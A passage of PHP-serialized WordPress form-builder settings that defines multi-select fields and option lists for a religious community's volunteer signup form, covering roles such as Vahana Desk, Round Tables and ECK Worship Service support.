Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:37:\"Trained Arahata With Prior Experience\";s:5:\"value\";s:37:\"Trained Arahata With Prior Experience\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:25:\"Trained Assistant Arahata\";s:5:\"value\";s:25:\"Trained Assistant Arahata\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:19:\"listmultiselect_236\";s:15:\"container_class\";s:10:\" one-third\";s:11:\"field_label\";s:8:\"Satsangs\";s:9:\"field_key\";s:19:\"listmultiselect_236\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:270;}i:11;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:12;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:15:\"listmultiselect\";s:5:\"label\";s:6:\"Vahana\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:5:\"multi\";s:10:\"multi_size\";s:1:\"3\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:7:\"options\";a:3:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:22:\"Potluck Help With Food\";s:5:\"value\";s:22:\"Potluck Help With Food\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:11:\"Vahana Desk\";s:5:\"value\";s:11:\"Vahana Desk\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:18:\"Vahana Team Member\";s:5:\"value\";s:18:\"Vahana Team Member\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:19:\"listmultiselect_237\";s:15:\"container_class\";s:17:\" one-third first \";s:11:\"field_label\";s:6:\"Vahana\";s:9:\"field_key\";s:19:\"listmultiselect_237\";}s:2:\"id\";i:271;}i:12;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:13;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:15:\"listmultiselect\";s:5:\"label\";s:21:\"Email Newsletter Help\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:5:\"multi\";s:10:\"multi_size\";s:1:\"2\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:7:\"options\";a:2:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"Gather Content\";s:5:\"value\";s:14:\"Gather Content\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:19:\"Write/Edit Articles\";s:5:\"value\";s:19:\"Write/Edit Articles\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:19:\"listmultiselect_234\";s:15:\"container_class\";s:10:\" one-third\";s:11:\"field_label\";s:21:\"Email Newsletter Help\";s:9:\"field_key\";s:19:\"listmultiselect_234\";}s:2:\"id\";i:268;}i:13;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:14;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:15:\"listmultiselect\";s:5:\"label\";s:12:\"Round Tables\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:5:\"multi\";s:10:\"multi_size\";s:1:\"2\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:7:\"options\";a:2:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:16:\"Attendee Support\";s:5:\"value\";s:16:\"Attendee Support\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:18:\"ECK Spiritual Aide\";s:5:\"value\";s:18:\"ECK Spiritual Aide\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:19:\"listmultiselect_235\";s:15:\"container_class\";s:10:\" one-third\";s:11:\"field_label\";s:12:\"Round Tables\";s:9:\"field_key\";s:19:\"listmultiselect_235\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:269;}i:14;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:15;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:15:\"listmultiselect\";s:5:\"label\";s:19:\"ECK Worship Service\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:5:\"multi\";s:10:\"multi_size\";s:2:\"12\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:7:\"options\";a:13:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:18:\"Attendee (support)\";s:5:\"value\";s:18:\"Attendee (support)\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:20:\"Audio Visual Support\";s:5:\"value\";s:20:\"Audio Visual Support\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:28:\"Clean Up Of Food After Event\";s:5:\"value\";s:28:\"Clean Up Of Food After Event\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"Creative Arts Coordinator\";s:5:\"value\";s:25:\"Creative Arts Coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 